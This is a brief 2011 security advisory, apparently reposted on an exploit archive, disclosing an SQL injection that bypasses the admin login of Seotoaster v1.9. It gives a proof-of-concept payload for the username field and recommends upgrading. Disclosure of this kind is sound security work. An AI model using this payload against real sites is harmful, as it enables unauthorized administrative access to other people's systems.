Seotoaster SQL Injection Admin Login Bypass

2011-12-16 14:15:03

#################################################################################
# Advisory: Seotoaster SQL-Injection Admin Login Bypass
# Author: Stefan Schurtz
# Contact: [email protected]
# Affected Software: Successfully tested on Seotoaster v.1.9
# Vendor URL: http://www.seotoaster.com/
# Vendor Status: fixed
#################################################################################

==========================
Vulnerability Description
==========================

Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login

==================
PoC-Exploit
==================

http://<target>/seotoaster/go

User: ' or 1=1)#
PW: notimportant

=========
Solution
=========

Upgrade to the latest version

========
Credits
========

Vulnerabilitiy found and advisory written by Stefan Schurtz

===========
References
===========

http://secunia.com/advisories/46881/

Fixes

No fixes

In order to submit a new fix you need to be registered.